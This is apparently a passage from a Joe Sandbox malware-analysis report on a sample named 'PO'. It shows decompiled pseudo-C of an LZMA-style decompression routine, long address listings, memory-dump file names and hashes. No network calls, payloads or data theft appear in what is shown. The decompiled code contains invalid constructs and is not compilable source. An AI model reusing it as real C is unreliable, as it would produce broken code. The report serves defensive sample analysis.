													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406c03
0x00406c03
0x00406c07
0x00406c14
0x00406c1e
0x00000000
0x00406c09
0x00406c09
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00406b3d
0x00406b40
0x00406eb2
0x00406eb2
0x00406eb2
0x00406eb5
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00406f03
0x00406f07
0x004070b6
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x004070e8
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00406eb2
0x00406eb2
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00406f2e
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00000000
0x00406f34
0x00406f2e
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x00000000
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x00406f2e
0x00406eb5
0x00406eb2
0x00000000
0x00406c07

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406B4F Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406B4F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004070E9))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
